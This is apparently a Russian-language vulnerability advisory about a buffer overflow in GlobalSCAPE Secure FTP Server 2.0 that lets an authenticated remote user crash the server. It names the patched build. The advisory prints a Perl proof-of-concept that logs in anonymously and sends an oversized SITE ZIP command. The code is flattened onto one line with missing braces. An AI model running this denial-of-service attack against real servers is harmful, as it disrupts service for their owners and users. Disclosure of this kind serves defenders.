Удаленный отказ в обслуживании против GlobalSCAPE Secure FTP Server
- Дата публикации:
- 19.03.2004
- Всего просмотров:
- 1018
- Опасность:
- Средняя
- Наличие исправления:
- Да
- Количество уязвимостей:
- 1
- CVSSv2 рейтинг:
- CVE ID:
- Нет данных
- Вектор эксплуатации:
- Удаленная
- Воздействие:
- Отказ в обслуживании
- CWE ID:
- Нет данных
- Наличие эксплоита:
- Нет данных
- Уязвимые продукты:
- GlobalSCAPE Secure FTP Server 2.x
Уязвимые версии: GlobalSCAPE Secure FTP Server 2.0 Build 03.11.2004.2
Описание: Переполнение буфера обнаружено в GlobalSCAPE Secure FTP Server. Удаленный авторизованный пользователь может аварийно завершить работу сервера.
Удаленный авторизованный пользователь может послать специально сформированную команду SITE, с параметром ~252 байта, чтобы перезаписать память и аварийно завершить работу сервера.
Пример/Эксплоит:
#!/usr/bin/perl use IO::Socket; $host = "192.168.1.243"; $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "2117"); unless ($remote) { die "cannot connect to ftp daemon on $host" } print "connected\n"; while (<$remote>) print $_; if (/220 /) { last; } $remote->autoflush(1); my $ftp = "USER anonymous\r\n"; print $remote $ftp; print $ftp; sleep(1); while (<$remote>) print $_; if (/331 /) { last; } $ftp = join("", "PASS ", "a\@b.com", "\r\n"); print $remote $ftp; print $ftp; sleep(1); while (<$remote>) print $_; if (/230 /) { last; } $ftp = join ("", "SITE ZIP /d:", "A"x(252), "\r\n"); print $remote $ftp; print $ftp; sleep(1); while (<$remote>) print $_; if (/250 Done/) { last; } close $remote;
URL производителя: http://www.cuteftp.com/gsftps/
Решение:Установите обновленную версию программы (2.0 Build 03.16.2004.1)
Ссылки:
GlobalSCAPE Secure FTP Server Buffer Overflow (Parameter Handling)